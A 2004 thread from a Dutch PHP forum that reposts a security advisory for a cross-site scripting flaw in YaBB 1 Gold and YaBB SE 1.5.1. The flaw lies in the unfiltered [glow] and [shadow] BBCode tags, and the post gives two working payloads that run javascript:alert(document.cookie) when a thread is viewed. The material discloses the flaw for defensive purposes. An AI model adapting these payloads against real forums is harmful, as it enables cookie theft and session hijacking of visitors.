[SEC] YaBBSE Veiligheidslek

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Arend a

Arend a

18/03/2004 23:49:00
Quote Anchor link
Advisory Name : YaBB/YaBBse Cross Site Scripting Vulnerability
Release Date : Mar 14,2004
Application : YaBB/YaBBse
Test On : YaBB 1 Gold(SP1.3)
YaBB SE 1.5.1 Final

Vendor URL : http://www.yabbforum.com/
http://www.yabbse.org/
Discover : Cheng Peng Su(apple_soup_at_msn.com)

#####################################
Proof of conecpt:

The problem is in [glow] and [shadow] tag, yabb doesn't filter the character in this tag, attack needn't visitor to click any links, just when the vistor read the thread, XSS code will be executed.

Exploit:
[glow=red);background:url(javascript:alert(document.cookie));filte r:glow(color=red,2,300]Big Exploit[/glow]

[shadow=red);background:url(javascript:alert(document.cookie));fil
ter:shadow(color=red,left,300]Big Exploit[/shadow]
 
PHP hulp

PHP hulp

10/01/2025 12:02:40
 
Rick

Rick

19/03/2004 01:39:00
Quote Anchor link
och YaBB is toch niets, langzaam en buggy
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.